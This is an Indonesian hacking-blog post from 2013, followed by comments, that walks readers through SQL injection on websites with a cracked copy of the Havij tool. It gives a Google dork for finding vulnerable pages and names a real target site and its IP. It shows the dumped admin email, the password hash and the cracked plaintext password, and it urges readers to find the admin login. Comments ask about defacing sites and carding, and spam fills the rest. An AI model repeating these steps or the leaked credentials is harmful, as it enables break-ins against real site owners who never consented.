• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Tutorial SQL Injection Menggunakan Tools Havij

February 19, 2013 by Jack Wilder 53 Comments

Kemarn saya sudah share Tools Havij 1.15 Pro version [Cracked] . Kali ini saya akan share cara menggunakan Havij tersebut untuk menemukan password web target dengan SQLi .
Oke, langsung saja kita mulai ritualnya :

Pertama, cari target lewat google dork.

Google Dork : inurl:”pages.php?id=”

Lalu kita pilih salah satu target. Untuk percobaan, saya pilih target : http://www.radiesse-voice.com/pages.php?id=15

Maka kita akan mendapat data-data sebagai berikut :

Kita masukkan alamat tersebut ke kolom target yang ada di Havij lalu klik analyze . tungu sampai kolom paling bawah bertuliskan Status : I’m IDLE

Host IP: 65.98.217.75
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.17
Keyword Found: Billing
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 7
Valid String Column is 3
Current DB: radiesse

Oke, lanjut ke step 2 : Klik Tables lalu kik Get Tables

Maka akan keluar kolom baru yaitu rad_admin, rad_news, rad_page . Karena kita ingin mencari akses admin, kita coba kolom rad_admin. centang kolom rad_admin lalu klik get columns

Setelah selesai, kita lihat di kolom bawah. Kita mendapatkan data sebagai berikut : 

Data Found: admin_id,admin_email,admin_pass=1^admin@radiesse.com^f97c5d29941bfb1b2fdab0874906ab82

Oke, hampir berhasil. Kita menemukan kolom : admin_id, admin_email, admin_pass, admin_passo
Kita coba lihat isi dari admin_id , admin_email, admin_pass . Centang admin_id , admin_email, admin_pass lalu klik get data

Admin ID : 1
Admin Email : admin@radiesse.com
Admin Password : f97c5d29941bfb1b2fdab0874906ab82
Namun password belum di encrypt. Maka kita encrypt menggunakan fitur MD5.
Dan kita mendapatkan data sebagai berikut : Plain text of f97c5d29941bfb1b2fdab0874906ab82 is one . Jadi passwordnya adalah one.
Sampai disini semua beres. Tinggal nyari admin loginnya. Karena ini butuh waktu yang lama, cari sendiri-sendiri aja ya Admin Loginnya. Gunakan Fitur Find Admin
Oke, sekian tutorial kali ini, selamat mencoba.
Shares

Filed Under: SQL Injection Tagged With: Hacking

Reader Interactions

Comments

  1. Naufal Hanif Rabbani says

    February 19, 2013 at 8:59 pm

    keren sob 🙂

    Reply
    • chiaki says

      February 19, 2013 at 10:30 pm

      Thanks kawan. . .

      Reply
    • ilham bagus says

      September 24, 2013 at 1:20 pm

      itu wajib ada pages.php?id=15 ya bro???

      Reply
  2. BlogS of Hariyanto says

    February 19, 2013 at 10:11 pm

    waduh…lagi-lagi saya hanya bisa duduk manis mencoba menyimak aoa yang tertulis disini 🙂

    Reply
    • chiaki says

      February 19, 2013 at 10:30 pm

      Oke sobat. . .

      Reply
  3. putra says

    February 19, 2013 at 11:41 pm

    ini pasti di forum itu tuh .. heheh… saya kemarin tau yang seperti ini soalnya 😀

    Reply
    • chiaki says

      February 20, 2013 at 12:56 am

      Kalo ini sih di semua forum ada. Basic nya. Hehehe

      Reply
  4. Alt-Amiend says

    February 20, 2013 at 12:38 am

    menyapa pagi kesini kawan….

    Reply
    • chiaki says

      February 21, 2013 at 12:12 am

      Thanks kawan. . .

      Reply
  5. Imtikhan.Com says

    February 20, 2013 at 1:25 am

    patut dipelajari sob
    izin simpan ya 🙂

    Reply
    • chiaki says

      February 20, 2013 at 9:44 am

      Iya kawan. . .

      Reply
  6. Masnady says

    February 20, 2013 at 2:46 am

    wah saya suport saja dech sobat, masih belum paham beginian nih.. ntr kalau saya dah beli kompi, saya minta ajarin beginian sama sobat..

    awas ya kalau nggak mau ngajarin hahahahahahaha

    Reply
    • chiaki says

      February 20, 2013 at 3:51 am

      :v

      Reply
  7. Brebes VS Lamongan says

    February 20, 2013 at 3:45 am

    met pagi nyimak bang soalnya belom punya tuh programnya hehehe

    Reply
    • chiaki says

      February 20, 2013 at 9:45 am

      Di artikel sebelumnya ada. :v

      Reply
  8. budi os 19 says

    February 20, 2013 at 5:23 am

    mantabbb nih sobat…kash infonya 🙂
    lanjuttt kan…hehe

    Reply
    • chiaki says

      February 20, 2013 at 9:44 am

      Thanks kawan. . .

      Reply
  9. Rohis Facebook says

    February 20, 2013 at 5:36 am

    aduh ampun.., lengkap banget sob… *smile

    Reply
    • chiaki says

      February 20, 2013 at 9:43 am

      :v

      Reply
  10. Bung Penho says

    February 20, 2013 at 4:04 pm

    waduh makin membingungkan yud. tetapi oke buat pelajaran baru nih!

    Reply
    • chiaki says

      February 21, 2013 at 12:12 am

      Hehehe. Ini mah baru basic.

      Reply
  11. Lanonadio says

    February 21, 2013 at 1:26 pm

    pusing mas sumpah hehehe

    Reply
    • chiaki says

      February 22, 2013 at 12:59 am

      :v

      Reply
    • Ipnul Haq says

      September 20, 2015 at 2:04 am

      Bro boleh tau gmail kamu gak bro? Biar aku bisa kontak kamu bro tutorial carding lebih lanjut

      Reply
  12. Ilmu Dunia dan Akhirat says

    April 3, 2013 at 1:18 am

    saya coba dulu ya gan defacenya.. 🙂

    Reply
  13. Andika yuda pratama says

    April 30, 2013 at 4:38 am

    bang kan ane udh dapet pass nya, nyari tempat admin login dimana ???

    Reply
    • chiaki says

      May 6, 2013 at 8:25 am

      Pake admin finder bro

      Reply
  14. Dedy muswar says

    May 4, 2013 at 3:32 pm

    waktu encrypt pass gk bisa gan hasilnya masih bil hash

    Reply
  15. Majalah Siantar says

    May 5, 2013 at 5:58 am

    mantaplah, tapi ga semua web bisa dijeboll

    Reply
    • chiaki says

      May 6, 2013 at 8:26 am

      Yang bilang semua siapa ?

      Reply
  16. Koh Lee Van Djocdja says

    May 10, 2013 at 11:11 am

    Lanjutkan pakde….. 🙂

    Reply
  17. Sekedar Info says

    May 23, 2013 at 2:17 pm

    admin loginnya ada dimana gan ????

    #bingung tingkat dewa neh…

    Reply
  18. Tiooo says

    June 28, 2013 at 4:41 pm

    Biar tau itu web bisa di hack darimananya min?

    Reply
  19. ~uchanet~ says

    July 9, 2013 at 12:45 am

    gan biasanya klo ngak nemu db (unknown) itu apanya yah…

    Reply
  20. Anonim says

    July 9, 2013 at 10:28 am

    md5 hash ya… yg masalah kalo password nya tdk ada dalam hash :v

    Reply
  21. Seftian says

    July 25, 2013 at 12:55 am

    makasih bang yuyud..
    ane seftian.. yang dlu..
    tp keren.. gw salut, soalnya ini d bahas secara detail (y)

    Reply
  22. Anonim says

    August 3, 2013 at 2:17 am

    bang cara login pke usernamenya gimana?
    kan kita cuma punya emailnya

    Reply
  23. Anonim says

    August 4, 2013 at 11:11 pm

    wani piro xixixixixixixixixi

    Reply
  24. Anonim says

    September 18, 2013 at 9:25 am

    copas beroh
    sumber tercantum :3

    Reply
  25. optimizer jakarta says

    November 4, 2013 at 5:42 am

    test ah 🙂

    Reply
  26. Anonim says

    November 12, 2013 at 2:24 pm

    ka tolong bantu gmn cara kita tau pages.php?id=15 saya udh cari di google dork ga ada terus saya coba ganti dengan angka lain ketika di analyze eror 404.jd gmn cara kita tau php?id suata website .thanks before

    Reply
  27. Anonim says

    November 13, 2013 at 3:45 am

    greattttt men

    Reply
  28. Azmi Hauzan Hazairin says

    November 16, 2013 at 6:12 am

    ko saya ada TULISAN

    "Component 'tabctl32.ocx' blablablablablablablablablablablablablablablablablablablablablablablablabla

    Reply
    • shinta says

      January 22, 2014 at 4:01 am

      "run as administrator" gan

      Reply
  29. Mahfud says

    December 9, 2013 at 3:09 pm

    kenapa tu bang halaman depan printscreen kok ada tulisan merah madura ciber. kenapa gambar yg lain kok gak ada.

    jangan2 abang juga Copas

    Reply
  30. Tilis Tiadi says

    December 10, 2013 at 7:42 am

    gan klw yang ini /pages.php?id=15 maksudnya apanya tuh gan?
    trus klw cara ngedapetinnya gimana? mohon bimbingannya gan. (newbie)

    Reply
  31. Anonim says

    March 28, 2014 at 9:57 am

    F*ck lu copas punya web orang

    Reply
    • chiaki says

      June 1, 2015 at 3:30 am

      gw copas dimana njing jawab

      Reply
  32. Anonim says

    April 13, 2014 at 1:37 am

    Oh my goodness! Incredible article dude! Many thanks, However I am encountering problems with your RSS.
    I don't understand the reason why I am unable to join it.
    Is there anybody else getting the same RSS problems? Anyone that knows the
    answer can youu kindky respond? Thanks!!

    Stop byy myy website :: post divorce advice for men

    Reply
  33. Ahmad Wahyudin says

    January 7, 2015 at 1:02 am

    segera miliki rumah tahan gempa desain klasik, menarik dgn suasana pedesaan yang eksotik. tersedia berbagai macam model
    rumah jawa seperti
    rumah joglo
    rumah limasan
    rumah kampung. kami juga menjual
    gebyok kayu jati lawas

    Reply
  34. ahmad wahyudin says

    March 19, 2015 at 3:06 pm

    jangan biarkan kulit keriput, jerawat dan bisul-bisul mengganggu penampilan anda, segera obati dengan gluta drink.
    manfaat susu gluta drink sudah terbukti nyata dan gluta drink yang asli hanya bisa anda dapatkan di
    distributor gluta drink yogyakarta

    Reply
  35. Anonim says

    March 20, 2015 at 8:47 am

    Waspada kanker serviks! jangan anggap sepele masalah keputihan anda, bisa jadi keputihan yang berlebih adalah gejala kanker serviks.
    berikut ini adalah cara mengobati keputihan dengan crystal x asli.

    Reply
  36. JbdcRoony says

    January 18, 2021 at 10:13 pm

    viagra for sale online buying viagra in uk online buy viagra in sydney australia http://llviabest.com/ – buying viagra online using pay pal ’

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

bWAPP Remote File Inclusion Medium Security Level

Bruteforce FTP Login dengan Metasploit Module FTP Authentication Scanner

Reverse Shell From Local File Inclusion Exploit

CVE-2019-13360 – CentOS Control Web Panel Authentication Bypass

Cara Mudah Hack cPanel dengan Fitur Reset Password

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

Exploit WordPress Ajax Load More PHP Upload Vulnerability

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

Cara Mendapatkan RDP Gratis Dengan Shell Windows

Laravel PHPUnit Remote Code Execution

LinuxSec / 87 queries in 0.31 seconds